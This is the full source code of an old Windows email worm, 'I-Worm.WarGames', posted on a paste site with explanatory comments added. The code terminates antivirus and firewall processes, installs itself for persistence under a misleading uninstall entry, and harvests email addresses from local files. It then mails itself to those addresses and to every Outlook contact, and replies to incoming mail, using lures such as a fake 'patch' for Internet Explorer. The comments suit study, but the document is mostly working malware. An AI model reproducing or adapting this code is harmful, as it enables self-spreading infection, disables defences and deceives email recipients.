
I-Worm.WarGames - Source Code

Jul 13th, 2023
  1. /*
  2. Name : I-Worm.WarGames
  3. Author : PetiK
  4. Date : February 12th 2002 - February 22nd 2002
  5. Language : C++/Win32asm
  6. */
  7.  
  8. #include <stdio.h>
  9. #include <windows.h>
  10. #include <mapi.h>
  11. #include <tlhelp32.h>
  12. #pragma argused
  13. #pragma inline
  14.  
  /* Process-wide state shared by WinMain and the helper routines below.
     All buffers are fixed-size; the Win32/MAPI calls that fill them are
     given these sizes, but the strcpy/strcat/wsprintf targets among them
     (copyr, subj, mname, maddr) are written without length checks. */
  15. char    filename[100],sysdir[100],copyr[50]="w",winhtm[100],subj[50];  // filename: path of the running module; copyr: generated copy name, always starts with 'w'
  16. int num,counter=0;  // num: number of letters to append to copyr (rand()%10, i.e. 0..9); counter: letters appended so far
  17. char    *alph[]={"a","b","c","d","e","f","g","h","i","j","k","l","m",
  18.          "n","o","p","q","r","s","t","u","v","w","x","y","z"};  // 26 entries, but WinMain indexes with GetTickCount()%25, so "z" is never picked
  19. char    dn[20]="Wargames Uninstall",ust[40]="rundll32 mouse,disable";  // written as DisplayName / UninstallString of the Uninstall key (the "uninstall" command is not an uninstaller)
  20. LPSTR   SHFolder=".DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders";  // opened under HKEY_USERS to locate the user's folders
  21. BYTE    desktop[50],favoris[50],personal[50],cache[50],page[150];  // shell-folder paths read from the registry; page is not used in this listing
  22. DWORD   sizcache=sizeof(desktop),sizfavoris=sizeof(favoris),
  23.     sizpersonal=sizeof(personal),sizdesktop=sizeof(cache),spage=sizeof(page);  // names are crossed (sizcache<-desktop, sizdesktop<-cache) but all four arrays are 50 bytes
  24. DWORD   type=REG_SZ;
  25. FILE    *vbsworm,*winstart;  // vbsworm: dropped VBScript; winstart is not used in this listing
  26. HANDLE  lSnapshot,myproc;  // Toolhelp snapshot and target process handle used by StopAV
  27. BOOL    rProcessFound;
  28.  
  29. LHANDLE session;  // Simple MAPI session used by the reply loop at the end of WinMain
  30. MapiMessage mess;  // outgoing message assembled by sendmail
  31. MapiMessage *mes;  // message returned by MAPIReadMail, rewritten in place and re-sent
  32. MapiRecipDesc from;
  33. char messId[512],mname[50],maddr[30];  // message id buffer; originator name/address copied with unchecked strcpy
  34. HINSTANCE hMAPI;
  35.  
  36. WIN32_FIND_DATA     ffile;  // shared by FindFile
  37. PROCESSENTRY32      uProcess;  // shared by StopAV
  38. HKEY            hReg;
  39. SYSTEMTIME      wartime;  // not used in this listing
  40.  
  41. void StopAV(char *);  // terminate processes whose image name contains the argument
  42. void FindFile(char *,char *);  // scan a folder for matching files and mail the address harvested from each
  43. void GetMail(char *,char *);  // copy the first mailto: target of a file into the second argument
  44. void sendmail(char *);  // send a MAPI message with this executable attached
  45.  
  /* Simple MAPI entry points, resolved at run time from MAPI32.DLL in WinMain. */
  46. ULONG (PASCAL FAR *mSendMail)(ULONG, ULONG, MapiMessage*, FLAGS, ULONG);
  47. ULONG (PASCAL FAR *mLogoff)(LHANDLE, ULONG, FLAGS, ULONG);
  48. ULONG (PASCAL FAR *mLogon)(ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPLHANDLE);
  49. ULONG (PASCAL FAR *mFindNext)(LHANDLE, ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPTSTR);
  50. ULONG (PASCAL FAR *mReadMail)(LHANDLE, ULONG, LPTSTR, FLAGS, ULONG, lpMapiMessage FAR *);
  51. ULONG (PASCAL FAR *mFreeBuffer)(LPVOID);
  52.  
  /* Entry point. In the order written below it:
     1. terminates a fixed list of antivirus/firewall processes and rival worms;
     2. copies itself into the system directory as article.doc.exe and registers
        an Add/Remove Programs entry whose "uninstall" command is rundll32 mouse,disable;
     3. copies itself under a random name, registers it in the WIN.INI run= line and
        schedules deletion of the original file through WININIT.INI;
     4. busy-waits (inline assembly) until InternetGetConnectedState reports a connection;
     5. harvests mailto: addresses from local documents and mails itself to each;
     6. drops and runs a VBScript that mails article.doc.exe to every Outlook address entry;
     7. replies to every message in the default MAPI store with itself attached as funny.exe.
     hPrev, lpCmd and nShow are unused. Return value is never set (falls off the end). */
  53. int WINAPI WinMain (HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmd, int nShow)
  54. {
  55. // Kill Some AntiVirus
  56. StopAV("AVP32.EXE");        // AVP
  57. StopAV("AVPCC.EXE");        // AVP
  58. StopAV("AVPM.EXE");     // AVP
  59. StopAV("WFINDV32.EXE");     // Dr. Solomon
  60. StopAV("F-AGNT95.EXE");     // F-Secure
  61. StopAV("NAVAPW32.EXE");     // Norton Antivirus
  62. StopAV("NAVW32.EXE");       // Norton Antivirus
  63. StopAV("NMAIN.EXE");        // Norton Antivirus
  64. StopAV("PAVSCHED.EXE");     // Panda AntiVirus
  65. StopAV("ZONEALARM.EXE");    // ZoneAlarm
  66.  
  67. // Kill Some Worm
  68. StopAV("KERN32.EXE");       // I-Worm.Badtrans
  69. StopAV("SETUP.EXE");        // I-Worm.Cholera
  70. StopAV("RUNDLLW32.EXE");    // I-Worm.Gift
  71. StopAV("GONER.SCR");        // I-Worm.Goner
  72. StopAV("LOAD.EXE");     // I-Worm.Nimda
  73. StopAV("INETD.EXE");        // I-Worm.Plage - BadTrans
  74. StopAV("FILES32.VXD");      // I-Worm.PrettyPark
  75. StopAV("SCAM32.EXE");       // I-Worm.Sircam
  76. StopAV("GDI32.EXE");        // I-Worm.Sonic
  77. StopAV("_SETUP.EXE");       // I-Worm.ZippedFiles
  78. StopAV("EXPLORE.EXE");      // I-Worm.ZippedFiles
  79. StopAV("ZIPPED_FILES.EXE"); // I-Worm.ZippedFiles
  80.  
  // Installation: own path, then work from the system directory.
  81. GetModuleFileName(hInst,filename,100);  // full path of the running executable (used later as the attachment source)
  82. GetSystemDirectory((char *)sysdir,100);
  83. SetCurrentDirectory(sysdir);
  84. CopyFile(filename,"article.doc.exe",TRUE);  // bFailIfExists=TRUE: an existing copy is left untouched
  85. RegCreateKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WarGames Worm",&hReg);
  86. RegSetValueEx(hReg,"DisplayName",0,REG_SZ,(BYTE *)dn,20);  // "Wargames Uninstall"
  87. RegSetValueEx(hReg,"UninstallString",0,REG_SZ,(BYTE *)ust,40);  // "rundll32 mouse,disable"
  88. RegCloseKey(hReg);
  89.  
  // Second copy under a random name: one letter per loop pass until num letters were added.
  90. randomize();  // Borland runtime: seeds rand()
  91. num=rand() % 10;  // 0..9; with num==0 the ++counter==num test below never matches and the loop has no exit
  92. randname:
  93. strcat(copyr,alph[GetTickCount()%25]);  // appends a..y (index 24 is the maximum)
  94. if(++counter==num) {
  95.     strcat(copyr,".exe");
  96.     MessageBox(NULL,copyr,"New Copy Name:",MB_OK|MB_ICONINFORMATION);  // shows the chosen name to the user (presumably a test dialog left in)
  97.     CopyFile(filename,copyr,FALSE);  // bFailIfExists=FALSE: overwrite
  98.     WriteProfileString("WINDOWS","RUN",copyr);  // WIN.INI [windows] run=<copy>: started at logon
  99.     WritePrivateProfileString("rename","NUL",filename,"WININIT.INI");  // WININIT.INI [rename] NUL=<original>: Win9x deletes the original file at next boot
  100.     goto endrandname;
  101.     }
  102. Sleep(GetTickCount()%100);  // vary the tick count between letter picks
  103. goto randname;
  104. endrandname:
  105.  
  // MAPISendMail is resolved here because sendmail() (called from FindFile below) needs it;
  // the remaining MAPI entry points are resolved just before the reply loop.
  106. hMAPI=LoadLibrary("MAPI32.DLL");
  107. (FARPROC &)mSendMail=GetProcAddress(hMAPI, "MAPISendMail");
  // Locate the Desktop/Favorites/Personal/Cache folders from the .DEFAULT user's Shell Folders key.
  108. RegOpenKeyEx(HKEY_USERS,SHFolder,0,KEY_QUERY_VALUE,&hReg);
  109. RegQueryValueEx(hReg,"Desktop",0,&type,desktop,&sizdesktop);
  110. RegQueryValueEx(hReg,"Favorites",0,&type,favoris,&sizfavoris);
  111. RegQueryValueEx(hReg,"Personal",0,&type,personal,&sizpersonal);
  112. RegQueryValueEx(hReg,"Cache",0,&type,cache,&sizcache);
  113. RegCloseKey(hReg);
  114. GetWindowsDirectory((char *)winhtm,100);
  115.  
  /* Connectivity gate in inline assembly. "call @wininet" pushes the address of the
     string that follows it as the LoadLibrary argument and jumps over it; the same
     trick supplies the export name to GetProcAddress. InternetGetConnectedState is
     then called in a loop with no delay (dec eax / jnz verf) until it returns 1,
     after which WININET.DLL is freed. If LoadLibrary fails the gate is skipped
     without FreeLibrary; if the export is missing, FreeLibrary is still called.
     Tmp is the data word used for the flags argument; "jmp end_all_asm" steps
     over it so the data is never executed. */
  116. _asm
  117. {
  118. call    @wininet
  119. db  "WININET.DLL",0
  120. @wininet:
  121. call    LoadLibrary
  122. test    eax,eax
  123. jz  end_asm
  124. mov ebp,eax
  125. call    @inetconnect
  126. db  "InternetGetConnectedState",0
  127. @inetconnect:
  128. push    ebp
  129. call    GetProcAddress
  130. test    eax,eax
  131. jz  end_wininet
  132. mov edi,eax
  133. verf:
  134. push    0
  135. push    Tmp
  136. call    edi
  137. dec eax
  138. jnz verf
  139.  
  140. end_wininet:
  141. push    ebp
  142. call    FreeLibrary
  143. end_asm:
  144. jmp end_all_asm
  145.  
  146. Tmp dd 0
  147.  
  148. end_all_asm:
  149. }
  150.  
  // Address harvesting: each call changes the working directory to the folder and
  // mails this executable to the first mailto: target of every matching file.
  151. FindFile(desktop,"*.htm");
  152. FindFile(desktop,"*.doc");
  153. FindFile(favoris,"*.ht*");
  154. FindFile(personal,"*.ht*");
  155. FindFile(personal,"*.doc");
  156. FindFile(personal,"*.xls");
  157. FindFile(personal,"*.asp");
  158. FindFile(cache,".ht*");  // no leading '*' in the remaining patterns: they match names beginning with ".ht"/".php"/".asp"/".doc"
  159. FindFile(cache,".php");
  160. FindFile(cache,".asp");
  161. FindFile(winhtm,".ht*");
  162. FindFile(winhtm,".doc");  // after this call the working directory is the Windows directory (if SetCurrentDirectory succeeded)
  163.  
  164.  
  // Dropped VBScript (relative path, i.e. in the current working directory): iterates every
  // Outlook address list and sends "Hi <name> read this." with <system dir>\article.doc.exe
  // attached, deleting each item after submit. fopen is not checked for failure.
  165. vbsworm=fopen("wargames.vbs","w");
  166. fprintf(vbsworm,"On Error Resume Next\n");
  167. fprintf(vbsworm,"msgbox %cScripting.FileSystemObject%c\n",34,34);  // displays a message box with that text when the script runs (presumably a test line left in)
  168. fprintf(vbsworm,"Set sf=CreateObject(%cScripting.FileSystemObject%c)\n",34,34);
  169. fprintf(vbsworm,"Set sys=sf.GetSpecialFolder(1)\n");  // 1 = system folder; matches where article.doc.exe was copied above
  170. fprintf(vbsworm,"Set OA=CreateObject(%cOutlook.Application%c)\n",34,34);
  171. fprintf(vbsworm,"Set MA=OA.GetNameSpace(%cMAPI%c)\n",34,34);
  172. fprintf(vbsworm,"For Each C In MA.AddressLists\n");
  173. fprintf(vbsworm,"If C.AddressEntries.Count <> 0 Then\n");
  174. fprintf(vbsworm,"For D=1 To C.AddressEntries.Count\n");
  175. fprintf(vbsworm,"Set AD=C.AddressEntries(D)\n");
  176. fprintf(vbsworm,"Set EM=OA.CreateItem(0)\n");
  177. fprintf(vbsworm,"EM.To=AD.Address\n");
  178. fprintf(vbsworm,"EM.Subject=%cHi %c&AD.Name&%c read this.%c\n",34,34,34,34);
  179. fprintf(vbsworm,"body=%cI found this on the web and it is important.%c\n",34,34);
  180. fprintf(vbsworm,"body = body & VbCrLf & %cOpen the attached file and read.%c\n",34,34);
  181. fprintf(vbsworm,"EM.Body=body\n");
  182. fprintf(vbsworm,"EM.Attachments.Add(sys&%c\\article.doc.exe%c)\n",34,34);
  183. fprintf(vbsworm,"EM.DeleteAfterSubmit=True\n");
  184. fprintf(vbsworm,"If EM.To <> %c%c Then\n",34,34);
  185. fprintf(vbsworm,"EM.Send\n");
  186. fprintf(vbsworm,"End If\n");
  187. fprintf(vbsworm,"Next\n");
  188. fprintf(vbsworm,"End If\n");
  189. fprintf(vbsworm,"Next\n");
  190. fclose(vbsworm);
  191. ShellExecute(NULL,"open","wargames.vbs",NULL,NULL,SW_SHOWNORMAL);  // run via the .vbs file association
  192. Sleep(5000);  // fixed 5 s grace period before the script file is removed
  193. DeleteFile("wargames.vbs");
  194.  
  // Reply loop: walk every message in the default store and send it back to its
  // originator with this executable attached. The block after the first mFindNext
  // (logoff, FreeLibrary) runs only when that first call succeeds.
  195. (FARPROC &)mLogon=GetProcAddress(hMAPI, "MAPILogon");
  196. (FARPROC &)mLogoff=GetProcAddress(hMAPI, "MAPILogoff");
  197. (FARPROC &)mFindNext=GetProcAddress(hMAPI, "MAPIFindNext");
  198. (FARPROC &)mReadMail=GetProcAddress(hMAPI, "MAPIReadMail");
  199. (FARPROC &)mFreeBuffer=GetProcAddress(hMAPI, "MAPIFreeBuffer");
  200. mLogon(NULL,NULL,NULL,MAPI_NEW_SESSION,NULL,&session);  // no profile/password, no logon UI flag; result unchecked
  201. if(mFindNext(session,0,NULL,NULL,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS) {
  202.   do {
  203.      if(mReadMail(session,NULL,messId,MAPI_ENVELOPE_ONLY|MAPI_PEEK,NULL,&mes)==SUCCESS_SUCCESS) {  // envelope only; PEEK leaves the unread state
  204.     strcpy(mname,mes->lpOriginator->lpszName);  // unchecked copy into 50 bytes; lpOriginator/lpRecips are not NULL-checked
  205.     strcpy(maddr,mes->lpOriginator->lpszAddress);  // unchecked copy into 30 bytes
  206.     mes->ulReserved=0;
  207.     mes->lpszSubject="Re: Fw:";
  208.     mes->lpszNoteText="I received your mail but I cannot reply immediatly.\n"
  209.                 "I send you a nice program. Look at this.\n\n"
  210.                 "   See you soon.";
  211.     mes->lpszMessageType=NULL;
  212.     mes->lpszDateReceived=NULL;
  213.     mes->lpszConversationID=NULL;
  214.     mes->flFlags=MAPI_SENT;
  // Swap roles: the old first recipient becomes the originator, the old originator the single recipient.
  215.     mes->lpOriginator->ulReserved=0;
  216.     mes->lpOriginator->ulRecipClass=MAPI_ORIG;
  217.     mes->lpOriginator->lpszName=mes->lpRecips->lpszName;
  218.     mes->lpOriginator->lpszAddress=mes->lpRecips->lpszAddress;
  219.     mes->nRecipCount=1;
  220.     mes->lpRecips->ulReserved=0;
  221.     mes->lpRecips->ulRecipClass=MAPI_TO;
  222.     mes->lpRecips->lpszName=mname;
  223.     mes->lpRecips->lpszAddress=maddr;
  224.     mes->nFileCount=1;
  225.     mes->lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc));  // allocated on every pass, freed only once after the loop
  226.     memset(mes->lpFiles, 0, sizeof(MapiFileDesc));
  227.     mes->lpFiles->ulReserved=0;
  228.     mes->lpFiles->flFlags=NULL;
  229.     mes->lpFiles->nPosition=-1;  // -1: no specific position in the note text
  230.     mes->lpFiles->lpszPathName=filename;  // attachment source is the running executable
  231.     mes->lpFiles->lpszFileName="funny.exe";  // name the recipient sees
  232.     mes->lpFiles->lpFileType=NULL;
  233.     mSendMail(session, NULL, mes, NULL, NULL);
  234.     }
  235.   }while(mFindNext(session,0,NULL,messId,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS);  // seed and output share messId
  236. free(mes->lpFiles);  // only the last pass's allocation; mFreeBuffer is likewise called once, for the last message read
  237. mFreeBuffer(mes);
  238. mLogoff(session,0,0,0);
  239. FreeLibrary(hMAPI);
  240. }
  241.  
  242.  
  243. }
  244.  
  /* Scan one folder for files matching ext and mail this executable to the first
     mailto: target found in each (GetMail + sendmail). Side effects: changes the
     process working directory to folder, so relative paths used afterwards in
     WinMain resolve there, and resets each matched file's attributes to ARCHIVE
     only. The FindFirstFile handle is never released with FindClose. Uses the
     global ffile. */
  245. void FindFile(char *folder, char *ext)
  246. {
  247. register bool abc=TRUE;  // becomes the BOOL result of FindNextFile
  248. register HANDLE hFile;
  249. char mail[128];  // GetMail writes at most 127 characters plus NUL
  250. SetCurrentDirectory(folder);  // result unchecked: on failure the previous directory is scanned
  251. hFile=FindFirstFile(ext,&ffile);
  252. if(hFile!=INVALID_HANDLE_VALUE) {
  253.     while(abc) {
  254.     SetFileAttributes(ffile.cFileName,FILE_ATTRIBUTE_ARCHIVE);  // clears any other attribute (read-only, hidden, ...)
  255.     GetMail(ffile.cFileName,mail);
  256.     if(strlen(mail)>0) {
  257.     sendmail(mail);
  258.     }
  259.     abc=FindNextFile(hFile,&ffile);
  260.     }
  261. }
  262.  
  263. }
  264.  
  /* Copy the first "mailto:" target of namefile into mail. The caller must supply
     at least 128 bytes: at most 127 characters plus NUL are written. mail is set
     to "" when the file cannot be opened or mapped, when no "mailto:" is found, or
     when the target contains no '@'. Only the first occurrence is examined (test
     ends the outer loop). The scan covers size-100 bytes of the mapping; size is a
     DWORD, so for files of 8..99 bytes the subtraction wraps. The early returns for
     size 0 and size < 8 leave hf open. */
  265. void GetMail(char *namefile, char *mail)
  266. {
  267. HANDLE  hf,hf2;
  268. char    *mapped;
  269. DWORD   size,i,k;
  270. BOOL    test=FALSE,valid=FALSE;  // test: a "mailto:" was seen; valid: the copied target contains '@'
  271. mail[0]=0;
  272.  
  273. hf=CreateFile(namefile,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIVE,0);
  274. if(hf==INVALID_HANDLE_VALUE)
  275.     return;
  276. size=GetFileSize(hf,NULL);
  277. if(!size)
  278.     return;  // hf is not closed on this path
  279. if(size<8)
  280.     return;  // nor on this one
  281. size-=100;  // unsigned: wraps when size < 100
  282.  
  283. hf2=CreateFileMapping(hf,0,PAGE_READONLY,0,0,0);
  284. if(!hf2) {
  285.     CloseHandle(hf);
  286.     return;
  287.     }
  288.  
  289. mapped=(char *)MapViewOfFile(hf2,FILE_MAP_READ,0,0,0);  // whole file, read-only
  290. if(!mapped) {
  291.     CloseHandle(hf2);
  292.     CloseHandle(hf);
  293.     return;
  294.     }
  295.  
  296. i=0;
  297. while(i<size && !test) {
  298. if(!strncmpi("mailto:",mapped+i,strlen("mailto:"))) {  // case-insensitive 7-byte compare (Borland strncmpi)
  299.     test=TRUE;
  300.     i+=strlen("mailto:");
  301.     k=0;
  302.     while(mapped[i]!=34 && mapped[i]!=39 && i<size && k<127) {  // stop at '"' (34) or '\'' (39), end of scan range, or 127 chars
  303.         if(mapped[i]!=' ') {  // spaces are dropped rather than terminating the target
  304.             mail[k]=mapped[i];
  305.             k++;
  306.             if(mapped[i]=='@')
  307.                 valid=TRUE;
  308.         }
  309.         i++;
  310.     }
  311.     mail[k]=0;
  312.     } else
  313.     i++;
  314. }
  315.  
  316. if(!valid)
  317.     mail[0]=0;  // discard targets without '@'
  318. UnmapViewOfFile(mapped);
  319. CloseHandle(hf2);
  320. CloseHandle(hf);
  321. return;
  322. }
  323.  
  /* Send a Simple MAPI message to tos (used as both recipient name and address)
     with the running executable attached as "patch.exe", through the globally
     resolved mSendMail with no session handle and no flags. subj is 50 bytes while
     tos may be up to 127 characters (see GetMail), so the wsprintf below can write
     past subj. If the lpFiles allocation fails the function returns with lpRecips
     still allocated. Uses the globals mess, from, subj and filename. */
  324. void sendmail(char *tos)
  325. {
  326. memset(&mess,0,sizeof(MapiMessage));
  327. memset(&from,0,sizeof(MapiRecipDesc));
  328. wsprintf(subj,"Mail to %s.",tos);  // unbounded format into subj[50]
  329.  
  330. from.lpszName=NULL;  // originator left anonymous
  331. from.ulRecipClass=MAPI_ORIG;
  332. mess.lpszSubject=subj;
  333. mess.lpszNoteText="I send you this patch.\n"
  334.         "It corrects a bug into Internet Explorer and Outlook.\n\n"
  335.         "   Have a nice day. Best Regards.";
  336.  
  337. mess.lpRecips=(MapiRecipDesc *)malloc(sizeof(MapiRecipDesc));
  338.     if(!mess.lpRecips)
  339.     return;
  340. memset(mess.lpRecips,0,sizeof(MapiRecipDesc));
  341. mess.lpRecips->lpszName=tos;
  342. mess.lpRecips->lpszAddress=tos;
  343. mess.lpRecips->ulRecipClass=MAPI_TO;
  344. mess.nRecipCount=1;
  345.  
  346. mess.lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc));
  347.     if(!mess.lpFiles)
  348.     return;  // lpRecips is not freed on this path
  349. memset(mess.lpFiles,0,sizeof(MapiFileDesc));
  350. mess.lpFiles->lpszPathName=filename;  // attachment source is the running executable
  351. mess.lpFiles->lpszFileName="patch.exe";  // name the recipient sees
  352. mess.nFileCount=1;
  353.  
  354. mess.lpOriginator=&from;
  355.  
  356. mSendMail(0,0,&mess,0,0);  // result unchecked
  357.  
  358. free(mess.lpRecips);
  359. free(mess.lpFiles);
  360. }
  361.  
  /* Terminate every running process whose image name contains antivirus as a
     substring. The match is strstr, i.e. case-sensitive and not anchored, so a
     name like "SETUP.EXE" also matches any longer image name containing it.
     Walks a Toolhelp process snapshot, opens each match with PROCESS_ALL_ACCESS
     and calls TerminateProcess; the result (term) is never examined and
     CloseHandle is called even when OpenProcess returned NULL. Uses the globals
     lSnapshot, uProcess, rProcessFound and myproc. */
  362. void StopAV(char *antivirus)
  363. {
  364. register BOOL term;  // assigned but never read
  365. lSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);  // result unchecked
  366. uProcess.dwSize=sizeof(uProcess);
  367. rProcessFound=Process32First(lSnapshot,&uProcess);
  368. while(rProcessFound) {
  369.     if(strstr(uProcess.szExeFile,antivirus)!=NULL) {
  370.         myproc=OpenProcess(PROCESS_ALL_ACCESS,FALSE,uProcess.th32ProcessID);
  371.         if(myproc!=NULL) {
  372.             term=TerminateProcess(myproc,0);
  373.         }
  374.         CloseHandle(myproc);  // also reached with myproc==NULL
  375.     }
  376.     rProcessFound=Process32Next(lSnapshot,&uProcess);
  377. }
  378. CloseHandle(lSnapshot);
  379. }
Tags: internet worm